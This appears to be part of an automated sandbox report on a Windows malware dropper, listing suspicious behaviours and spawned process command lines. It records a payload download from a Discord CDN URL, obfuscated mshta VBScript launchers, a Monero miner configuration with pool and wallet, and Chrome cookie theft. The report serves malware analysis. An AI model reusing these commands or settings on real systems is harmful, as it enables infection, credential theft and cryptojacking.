| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (4).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (4).exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\252N17XASxQvYmwIPdgoOr2I.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\252N17XASxQvYmwIPdgoOr2I.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\3771582.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\1037051.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\JrnsbXuKnHgCU4MXvd9lN673.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\6286019.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\4366989.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\MlyZ927p4yUTmG7wolwMjuJW.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\Q75PAMhmUCVu5EYVYjDtmwTV.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\g8e3AhvD_JzgYVY7B0rwBYJ8.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\MlyZ927p4yUTmG7wolwMjuJW.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-FCAGE.tmp\builder.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\Nd_tCvBxyCqjxaKpTy7uzCrF.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (4).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (4).exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv yKasnM7UgUqICmWI3CBItg.0.2
C:\Users\Admin\Documents\6Ylf2oyixuJlsFBBGCC2hhnH.exe
"C:\Users\Admin\Documents\6Ylf2oyixuJlsFBBGCC2hhnH.exe"
C:\Users\Admin\Documents\252N17XASxQvYmwIPdgoOr2I.exe
"C:\Users\Admin\Documents\252N17XASxQvYmwIPdgoOr2I.exe"
C:\Users\Admin\Documents\QtlJmdftBRMjXw9vCUiz1xyb.exe
"C:\Users\Admin\Documents\QtlJmdftBRMjXw9vCUiz1xyb.exe"
C:\Users\Admin\Documents\g8e3AhvD_JzgYVY7B0rwBYJ8.exe
"C:\Users\Admin\Documents\g8e3AhvD_JzgYVY7B0rwBYJ8.exe"
C:\Users\Admin\Documents\JrnsbXuKnHgCU4MXvd9lN673.exe
"C:\Users\Admin\Documents\JrnsbXuKnHgCU4MXvd9lN673.exe"
C:\Users\Admin\Documents\vtyA9G81l1cmrF3KJ7iIdZ5W.exe
"C:\Users\Admin\Documents\vtyA9G81l1cmrF3KJ7iIdZ5W.exe"
C:\Users\Admin\Documents\MlyZ927p4yUTmG7wolwMjuJW.exe
"C:\Users\Admin\Documents\MlyZ927p4yUTmG7wolwMjuJW.exe"
C:\Users\Admin\Documents\Q75PAMhmUCVu5EYVYjDtmwTV.exe
"C:\Users\Admin\Documents\Q75PAMhmUCVu5EYVYjDtmwTV.exe"
C:\Users\Admin\Documents\YYUtH3wzsrRdr9GJTVYmEo6Y.exe
"C:\Users\Admin\Documents\YYUtH3wzsrRdr9GJTVYmEo6Y.exe"
C:\Users\Admin\Documents\s2SrnkZeJColor_BCrMr4Qso.exe
"C:\Users\Admin\Documents\s2SrnkZeJColor_BCrMr4Qso.exe"
C:\Users\Admin\Documents\hoN0r0eWJkmJDk4Ic3MMAGbj.exe
"C:\Users\Admin\Documents\hoN0r0eWJkmJDk4Ic3MMAGbj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3888 -s 276
C:\Users\Admin\Documents\mOT8c14fTMQWPkspwIJIZRyi.exe
"C:\Users\Admin\Documents\mOT8c14fTMQWPkspwIJIZRyi.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3888 -ip 3888
C:\Users\Admin\Documents\252N17XASxQvYmwIPdgoOr2I.exe
"C:\Users\Admin\Documents\252N17XASxQvYmwIPdgoOr2I.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BC41.tmp\BC42.tmp\BC43.bat C:\Users\Admin\Documents\6Ylf2oyixuJlsFBBGCC2hhnH.exe"
C:\Users\Admin\AppData\Local\Temp\is-PGKIS.tmp\mOT8c14fTMQWPkspwIJIZRyi.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PGKIS.tmp\mOT8c14fTMQWPkspwIJIZRyi.tmp" /SL5="$20306,138429,56832,C:\Users\Admin\Documents\mOT8c14fTMQWPkspwIJIZRyi.exe"
C:\Users\Admin\Documents\s2SrnkZeJColor_BCrMr4Qso.exe
"C:\Users\Admin\Documents\s2SrnkZeJColor_BCrMr4Qso.exe" -q
C:\Users\Admin\AppData\Local\Temp\BC41.tmp\BC42.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BC41.tmp\BC42.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Users\Admin\Documents\YYUtH3wzsrRdr9GJTVYmEo6Y.exe
C:\Users\Admin\Documents\YYUtH3wzsrRdr9GJTVYmEo6Y.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 1216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4724 -ip 4724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 4724 -ip 4724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 1240
C:\Users\Admin\AppData\Roaming\6286019.exe
"C:\Users\Admin\AppData\Roaming\6286019.exe"
C:\Users\Admin\AppData\Roaming\7848124.exe
"C:\Users\Admin\AppData\Roaming\7848124.exe"
C:\Users\Admin\AppData\Roaming\1104254.exe
"C:\Users\Admin\AppData\Roaming\1104254.exe"
C:\Users\Admin\AppData\Roaming\4366989.exe
"C:\Users\Admin\AppData\Roaming\4366989.exe"
C:\Users\Admin\AppData\Local\Temp\BC41.tmp\BC42.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BC41.tmp\BC42.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4724 -ip 4724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 1240
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\Documents\biPuD4NMCX1aWFXogrvwgyou.exe
"C:\Users\Admin\Documents\biPuD4NMCX1aWFXogrvwgyou.exe"
C:\Users\Admin\Documents\PJ_aNIjQvqt14trhW_Ucrq8U.exe
"C:\Users\Admin\Documents\PJ_aNIjQvqt14trhW_Ucrq8U.exe"
C:\Users\Admin\AppData\Local\Temp\BC41.tmp\BC42.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BC41.tmp\BC42.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879627930865639475/DES6_6_6.exe" "DES6_6_6.exe" "" "" "" "" "" ""
C:\Users\Admin\Documents\zmyJsBQVTyKAKlzE6Zk93Aiu.exe
"C:\Users\Admin\Documents\zmyJsBQVTyKAKlzE6Zk93Aiu.exe"
C:\Users\Admin\Documents\OxEMjCce4jUyKLgMR7tzCSZn.exe
"C:\Users\Admin\Documents\OxEMjCce4jUyKLgMR7tzCSZn.exe"
C:\Users\Admin\Documents\68N9UkYMb0rIC3Al6Fz2bfWy.exe
"C:\Users\Admin\Documents\68N9UkYMb0rIC3Al6Fz2bfWy.exe"
C:\Users\Admin\Documents\6w8pXrjYGBv_496W2DScTPB5.exe
"C:\Users\Admin\Documents\6w8pXrjYGBv_496W2DScTPB5.exe"
C:\Users\Admin\Documents\y6oB6X0JZzjl8qPpJh9Fxwxp.exe
"C:\Users\Admin\Documents\y6oB6X0JZzjl8qPpJh9Fxwxp.exe"
C:\Users\Admin\Documents\RUCOCZIgIz6EZKdtv5ptdFUF.exe
"C:\Users\Admin\Documents\RUCOCZIgIz6EZKdtv5ptdFUF.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Users\Admin\Documents\HUU_BBwFffdwtjU3aaYogmcF.exe
"C:\Users\Admin\Documents\HUU_BBwFffdwtjU3aaYogmcF.exe"
C:\Users\Admin\Documents\7tzdBCrqnVzn34WZzl2HJIRv.exe
"C:\Users\Admin\Documents\7tzdBCrqnVzn34WZzl2HJIRv.exe"
C:\Users\Admin\Documents\qaGGfh07ZqrsDrnbz8QRWzTX.exe
"C:\Users\Admin\Documents\qaGGfh07ZqrsDrnbz8QRWzTX.exe"
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\6w8pXrjYGBv_496W2DScTPB5.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\6w8pXrjYGBv_496W2DScTPB5.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\30528\DES6_6_6.exe
DES6_6_6.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2988 -ip 2988
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 316
C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\6w8pXrjYGBv_496W2DScTPB5.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ("C:\Users\Admin\Documents\6w8pXrjYGBv_496W2DScTPB5.exe" ) do taskkill -im "%~NXj" -f
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
C:\Users\Admin\Documents\HUU_BBwFffdwtjU3aaYogmcF.exe
C:\Users\Admin\Documents\HUU_BBwFffdwtjU3aaYogmcF.exe
C:\Users\Admin\AppData\Local\Temp\BC41.tmp\BC42.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BC41.tmp\BC42.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
C:\Users\Admin\AppData\Local\Temp\is-1MG4N.tmp\Stats.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1MG4N.tmp\Stats.tmp" /SL5="$404B8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Local\Temp\is-Q58R4.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q58R4.tmp\Inlog.tmp" /SL5="$2047A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-944N2.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-944N2.tmp\WEATHER Manager.tmp" /SL5="$1057E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3840 -ip 3840
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1936 -ip 1936
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
C:\Users\Admin\AppData\Local\Temp\is-L6FAD.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L6FAD.tmp\MediaBurner2.tmp" /SL5="$10588,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe
Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 296
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
C:\Users\Admin\AppData\Local\Temp\is-B20O3.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-B20O3.tmp\VPN.tmp" /SL5="$204BE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 292
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3596 -ip 3596
C:\Windows\SysWOW64\taskkill.exe
taskkill -im "6w8pXrjYGBv_496W2DScTPB5.exe" -f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 280
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF ""-PMrvgB7ejl2YIjc3PC8aTZbo"" == """" for %j iN (""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5432 -ip 5432
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "-PMrvgB7ejl2YIjc3PC8aTZbo" == "" for %j iN ("C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" ) do taskkill -im "%~NXj" -f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1196 -ip 1196
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
C:\Users\Admin\AppData\Local\Temp\AB16.exe
C:\Users\Admin\AppData\Local\Temp\AB16.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 272
C:\Users\Admin\AppData\Local\Temp\is-KHGQJ.tmp\ultradumnibour.exe
"C:\Users\Admin\AppData\Local\Temp\is-KHGQJ.tmp\ultradumnibour.exe" /S /UID=burnerch2
C:\Users\Admin\AppData\Local\Temp\is-FCAGE.tmp\builder.exe
"C:\Users\Admin\AppData\Local\Temp\is-FCAGE.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 1384 -ip 1384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 812
C:\Users\Admin\AppData\Local\Temp\B603.exe
C:\Users\Admin\AppData\Local\Temp\B603.exe
C:\Users\Admin\AppData\Local\Temp\tmpA029_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmpA029_tmp.exe"
C:\Users\Admin\AppData\Roaming\4966555.exe
"C:\Users\Admin\AppData\Roaming\4966555.exe"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\3771582.exe
"C:\Users\Admin\AppData\Roaming\3771582.exe"
C:\Users\Admin\AppData\Roaming\3187303.exe
"C:\Users\Admin\AppData\Roaming\3187303.exe"
C:\Users\Admin\AppData\Local\Temp\is-M3SAO.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-M3SAO.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
C:\Users\Admin\AppData\Roaming\6868748.exe
"C:\Users\Admin\AppData\Roaming\6868748.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Users\Admin\AppData\Roaming\4277866.exe
"C:\Users\Admin\AppData\Roaming\4277866.exe"
C:\Users\Admin\AppData\Local\Temp\CC8A.exe
C:\Users\Admin\AppData\Local\Temp\CC8A.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 4796 -ip 4796
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\D1AC.exe
C:\Users\Admin\AppData\Local\Temp\D1AC.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4796 -s 280
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 676 -p 3176 -ip 3176
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 185E16A589423C4510D7A3E06C7A0799 C
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\HwWYSzK.F2,zgr
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3176 -s 2356
